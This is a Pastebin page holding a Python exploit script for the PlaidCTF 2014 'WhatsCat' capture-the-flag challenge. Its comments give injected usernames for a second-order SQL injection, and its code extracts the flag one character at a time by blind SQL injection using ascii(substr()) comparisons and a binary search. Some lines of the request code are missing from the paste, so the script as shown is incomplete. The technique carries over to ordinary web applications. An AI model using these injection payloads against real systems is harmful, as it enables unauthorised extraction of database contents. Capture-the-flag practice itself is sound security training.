﻿

# PPP's WhatsCat Challenge Exploit by @ngocdh

Apr 13th, 2014
942
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
1. #PPP's WhatsCat Challenge Exploit by @ngocdh
2. #http://play.plaidctf.com/files/whatscat-59b6f6c9b192457fa3e7d2253c8b24c9.tar.bz2
3. #
4. #Step 1 : Register with username "hn"
5. #Step 2 : Register with username "hn' and 21=(select length(flag) from flag)#"
6. #Step 3 : Reset password of the 2nd user
8. #
9. #The flag table/column and length were found manually
10. #This code extracts only the flag
11.
12. import urllib2
13. import string
14. import random
15.
16. def idgen(size=6, chars=string.ascii_uppercase + string.digits):
17.   return ''.join(random.choice(chars) for _ in range(size))
18.
19. def check(pos,d,u):
20.   id = idgen() + "hn"
21.
22.   query = id + "'%20and%20(select%20ascii(substr(flag,"+pos+",1))from%20flag)%20between%20"+d+"%20and%20"+u+"#"
23.
25.
26.   data_reg = "name="+id+"&pass=hn&email=hn&register=Register"
27.   data_reg2 = "name="+query+"&pass=hn&email=hn&register=Register"
30.
35.
36.   if c.find("Welcome back")>0 and c.find("invalid")<0:
37.     return 0
38.   else:
39.     return 1
40.
41. res = ""
42. for i in range(1,22):
43.   p=0
44.   q=255
45.   for x in range(0,8):
46.     n = (p+q)/2
47.     temp = check(str(i),str(p),str(n))
48.     q = n if temp==1 else q
49.     p = n+1 if temp==0 else p
50.   res = res + chr(p)
51.   print res
RAW Paste Data